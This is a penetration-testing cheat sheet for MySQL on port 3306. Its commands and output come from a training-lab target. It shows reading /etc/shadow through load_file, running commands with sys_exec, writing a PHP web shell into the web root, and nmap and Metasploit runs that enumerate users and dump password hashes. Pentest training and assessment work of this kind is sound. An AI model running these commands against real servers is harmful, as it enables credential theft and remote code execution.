3306 - MySQL

MySQL is a very popular open-source relational database management system.

Connecting

Connect using one of the following options:

mysql client (builtin in Kali)
metasploit (mysql_login)

mysql client:

mysql -h 192.102.118.3 -u root

Basic Commands

show databases:

MySQL [(none)]> show databases; 
+--------------------+ 
| Database           | 
+--------------------+ 
| information_schema | 
| books              | 
| data               | 
| mysql              | 
| password           | 
| performance_schema | 
| secret             | 
| store              | 
| upload             | 
| vendors            | 
| videos             | 
+--------------------+ 
11 rows in set (0.001 sec) 
MySQL [(none)]>

display tables:

MySQL [books]> show tables; 
+-----------------+ 
| Tables_in_books | 
+-----------------+ 
| authors         | 
+-----------------+ 
count columns: 
MySQL [books]> SELECT count(*) FROM authors; 
+----------+ 
| count(*) | 
+----------+ 
|       10 | 
+----------+ 
1 row in set (0.001 sec)

load file:

MySQL [(none)]> select load_file("/etc/shadow"); 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
| load_file("/etc/shadow")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      | 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
| root:$6$eoOI5IAu$S1eBFuRRxwD7qEcUI3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/:17861:0:99999:7::: 
daemon:*:17850:0:99999:7::: 
bin:*:17850:0:99999:7::: 
sys:*:17850:0:99999:7::: 
sync:*:17850:0:99999:7::: 
games:*:17850:0:99999:7::: 
man:*:17850:0:99999:7::: 
lp:*:17850:0:99999:7::: 
mail:*:17850:0:99999:7::: 
news:*:17850:0:99999:7::: 
uucp:*:17850:0:99999:7::: 
proxy:*:17850:0:99999:7::: 
www-data:*:17850:0:99999:7::: 
backup:*:17850:0:99999:7::: 
list:*:17850:0:99999:7::: 
irc:*:17850:0:99999:7::: 
gnats:*:17850:0:99999:7::: 
nobody:*:17850:0:99999:7::: 
libuuid:!:17850:0:99999:7::: 
syslog:*:17850:0:99999:7::: 
mysql:!:17857:0:99999:7::: 
dbadmin:$6$vZ3Fv3x6$qdB/lOAC1EtkdbQKpHEp/BkVMQD2C2AFPkYW3.W7jMlMbl5.:17861:0:99999:7::: 
 | 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
1 row in set (0.000 sec)

Command execution

If mysql is running as root you can run commands by typing:

select sys_exec('whoami');

select sys_eval('whoami');

select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/var/www/html/this-is-my-shell.php'

Enumeration

Nmap

Nmap scripts

root@attackdefense:~# ls /usr/share/nmap/scripts/*mysql* 
/usr/share/nmap/scripts/mysql-audit.nse 
/usr/share/nmap/scripts/mysql-dump-hashes.nse 
/usr/share/nmap/scripts/mysql-info.nse 
/usr/share/nmap/scripts/mysql-variables.nse 
/usr/share/nmap/scripts/mysql-brute.nse 
/usr/share/nmap/scripts/mysql-empty-password.nse 
/usr/share/nmap/scripts/mysql-query.nse 
/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse 
/usr/share/nmap/scripts/mysql-databases.nse 
/usr/share/nmap/scripts/mysql-enum.nse 
/usr/share/nmap/scripts/mysql-users.nse

User enumeration:

root@attackdefense:~# nmap -p 3306 192.102.118.3 --script mysql-enum 
Starting Nmap 7.70 ( 
https://nmap.org
 ) at 2019-11-04 16:22 UTC 
Nmap scan report for target-1 (192.102.118.3) 
Host is up (0.000059s latency). 
 
PORT     STATE SERVICE 
3306/tcp open  mysql 
| mysql-enum:  
|   Valid usernames:  
|     root:<empty> - Valid credentials 
|     user:<empty> - Valid credentials 
|     web:<empty> - Valid credentials 
|     guest:<empty> - Valid credentials 
|     test:<empty> - Valid credentials 
|     sysadmin:<empty> - Valid credentials 
|     administrator:<empty> - Valid credentials 
|     webadmin:<empty> - Valid credentials 
|     admin:<empty> - Valid credentials 
|     netadmin:<empty> - Valid credentials 
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0 
MAC Address: 02:42:C0:66:76:03 (Unknown)

dump hashes

root@attackdefense:~# nmap -p 3306 192.102.118.3 --script mysql-dump-hashes.nse --script-args='username=root,password=' 
Starting Nmap 7.70 ( 
https://nmap.org
 ) at 2019-11-04 16:33 UTC 
Nmap scan report for target-1 (192.102.118.3) 
Host is up (0.000060s latency). 
 
PORT     STATE SERVICE 
3306/tcp open  mysql 
| mysql-dump-hashes:  
|   debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D 
|   filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B 
|   ultra:*827EC562775DC9CE458689D36687DCED320F34B0 
|   guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646 
|   sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0 
|   udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9 
|_  sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14 
MAC Address: 02:42:C0:66:76:03 (Unknown) 
 
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Metasploit

Modules:

msf5 > search mysql 

Matching Modules 
================ 
   #   Name                                                  Disclosure Date  Rank       Check  Description 
   -   ----                                                  ---------------  ----       -----  ----------- 
   1   auxiliary/admin/http/manageengine_pmp_privesc         2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 
   2   auxiliary/admin/http/rails_devise_pass_reset          2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset 
   3   auxiliary/admin/mysql/mysql_enum                                       normal     No     MySQL Enumeration Module 
   4   auxiliary/admin/mysql/mysql_sql                                        normal     No     MySQL SQL Generic Query 
   5   auxiliary/admin/tikiwiki/tikidblib                    2006-11-01       normal     No     TikiWiki Information Disclosure 
   6   auxiliary/analyze/jtr_mysql_fast                                       normal     No     John the Ripper MySQL Password Cracker (Fast Mode) 
   7   auxiliary/gather/joomla_weblinks_sqli                 2014-03-02       normal     Yes    Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read 
   8   auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal     Yes    MySQL Authentication Bypass Password Dump 
   9   auxiliary/scanner/mysql/mysql_file_enum                                normal     Yes    MYSQL File/Directory Enumerator 
   10  auxiliary/scanner/mysql/mysql_hashdump                                 normal     Yes    MYSQL Password Hashdump 
   11  auxiliary/scanner/mysql/mysql_login                                    normal     Yes    MySQL Login Utility 
   12  auxiliary/scanner/mysql/mysql_schemadump                               normal     Yes    MYSQL Schema Dump 
   13  auxiliary/scanner/mysql/mysql_version                                  normal     Yes    MySQL Server Version Enumeration 
   14  auxiliary/scanner/mysql/mysql_writable_dirs                            normal     Yes    MYSQL Directory Write Test 
   15  auxiliary/server/capture/mysql                                         normal     No     Authentication Capture: MySQL 
   16  exploit/linux/mysql/mysql_yassl_getname               2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow 
   17  exploit/linux/mysql/mysql_yassl_hello                 2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow 
   18  exploit/multi/http/manage_engine_dc_pmp_sqli          2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 
   19  exploit/multi/http/zpanel_information_disclosure_rce  2014-01-30       excellent  No     Zpanel Remote Unauthenticated RCE 
   20  exploit/multi/mysql/mysql_udf_payload                 2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution 
   21  exploit/unix/webapp/kimai_sqli                        2013-05-21       average    Yes    Kimai v0.9.2 'db_restore.php' SQL Injection 
   22  exploit/unix/webapp/wp_google_document_embedder_exec  2013-01-03       normal     Yes    WordPress Plugin Google Document Embedder Arbitrary File Disclosure 
   23  exploit/windows/mysql/mysql_mof                       2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution 
   24  exploit/windows/mysql/mysql_start_up                  2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse 
   25  exploit/windows/mysql/mysql_yassl_hello               2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow 
   26  exploit/windows/mysql/scrutinizer_upload_exec         2012-07-27       excellent  Yes    Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential 
   27  post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations 
   28  post/linux/gather/enum_users_history                                   normal     No     Linux Gather User History 
   29  post/multi/manage/dbvis_add_db_admin                                   normal     No     Multi Manage DbVisualizer Add Db Admin

Enumerate directories:

msf5 auxiliary(scanner/mysql/mysql_file_enum) > show options  

Module options (auxiliary/scanner/mysql/mysql_file_enum): 
 
   Name           Current Setting  Required  Description 
   ----           ---------------  --------  ----------- 
   DATABASE_NAME  mysql            yes       Name of database to use 
   FILE_LIST                       yes       List of directories to enumerate 
   PASSWORD                        no        The password for the specified username 
   RHOSTS         192.102.118.3    yes       The target address range or CIDR identifier 
   RPORT          3306             yes       The target port (TCP) 
   TABLE_NAME     RxJwRpLp         yes       Name of table to use - Warning, if the table already exists its contents will be corrupted 
   THREADS        1                yes       The number of concurrent threads 
   USERNAME       root             yes       The username to authenticate as  
msf5 auxiliary(scanner/mysql/mysql_file_enum) > set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt 
FILE_LIST => /usr/share/metasploit-framework/data/wordlists/directory.txt 
msf5 auxiliary(scanner/mysql/mysql_file_enum) > run 
 
[+] 192.102.118.3:3306    - /tmp is a directory and exists 
[+] 192.102.118.3:3306    - /etc/passwd is a file and exists 
[+] 192.102.118.3:3306    - /etc/shadow is a file and exists 
[+] 192.102.118.3:3306    - /root is a directory and exists 
[+] 192.102.118.3:3306    - /home is a directory and exists 
[+] 192.102.118.3:3306    - /etc is a directory and exists 
[+] 192.102.118.3:3306    - /etc/hosts is a file and exists 
[+] 192.102.118.3:3306    - /usr/share is a directory and exists 
[+] 192.102.118.3:3306    - /etc is a directory and exists 
[*] 192.102.118.3:3306    - Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf5 auxiliary(scanner/mysql/mysql_file_enum) >

Previous2049 - NFS Next3389 - RDP

Last updated 5 years ago

MySQL [(none)]> select load_file("/etc/shadow"); +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | load_file("/etc/shadow") | +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | root:$6$eoOI5IAu$S1eBFuRRxwD7qEcUI3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/:17861:0:99999:7::: daemon:*:17850:0:99999:7::: bin:*:17850:0:99999:7::: sys:*:17850:0:99999:7::: sync:*:17850:0:99999:7::: games:*:17850:0:99999:7::: man:*:17850:0:99999:7::: lp:*:17850:0:99999:7::: mail:*:17850:0:99999:7::: news:*:17850:0:99999:7::: uucp:*:17850:0:99999:7::: proxy:*:17850:0:99999:7::: www-data:*:17850:0:99999:7::: backup:*:17850:0:99999:7::: list:*:17850:0:99999:7::: irc:*:17850:0:99999:7::: gnats:*:17850:0:99999:7::: nobody:*:17850:0:99999:7::: libuuid:!:17850:0:99999:7::: syslog:*:17850:0:99999:7::: mysql:!:17857:0:99999:7::: dbadmin:$6$vZ3Fv3x6$qdB/lOAC1EtkdbQKpHEp/BkVMQD2C2AFPkYW3.W7jMlMbl5.:17861:0:99999:7::: | +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 1 row in set (0.000 sec)

msf5 > search mysql Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 2 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset 3 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module 4 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query 5 auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal No TikiWiki Information Disclosure 6 auxiliary/analyze/jtr_mysql_fast normal No John the Ripper MySQL Password Cracker (Fast Mode) 7 auxiliary/gather/joomla_weblinks_sqli 2014-03-02 normal Yes Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read 8 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal Yes MySQL Authentication Bypass Password Dump 9 auxiliary/scanner/mysql/mysql_file_enum normal Yes MYSQL File/Directory Enumerator 10 auxiliary/scanner/mysql/mysql_hashdump normal Yes MYSQL Password Hashdump 11 auxiliary/scanner/mysql/mysql_login normal Yes MySQL Login Utility 12 auxiliary/scanner/mysql/mysql_schemadump normal Yes MYSQL Schema Dump 13 auxiliary/scanner/mysql/mysql_version normal Yes MySQL Server Version Enumeration 14 auxiliary/scanner/mysql/mysql_writable_dirs normal Yes MYSQL Directory Write Test 15 auxiliary/server/capture/mysql normal No Authentication Capture: MySQL 16 exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow 17 exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow 18 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 19 exploit/multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE 20 exploit/multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution 21 exploit/unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection 22 exploit/unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure 23 exploit/windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution 24 exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse 25 exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow 26 exploit/windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential 27 post/linux/gather/enum_configs normal No Linux Gather Configurations 28 post/linux/gather/enum_users_history normal No Linux Gather User History 29 post/multi/manage/dbvis_add_db_admin normal No Multi Manage DbVisualizer Add Db Admin

hashtagConnecting

hashtagmysql client:

hashtagBasic Commands

hashtagCommand execution

hashtagEnumeration

hashtagNmap

hashtagNmap scripts

hashtag User enumeration:

hashtagdump hashes

hashtagMetasploit

hashtagModules:

hashtagEnumerate directories: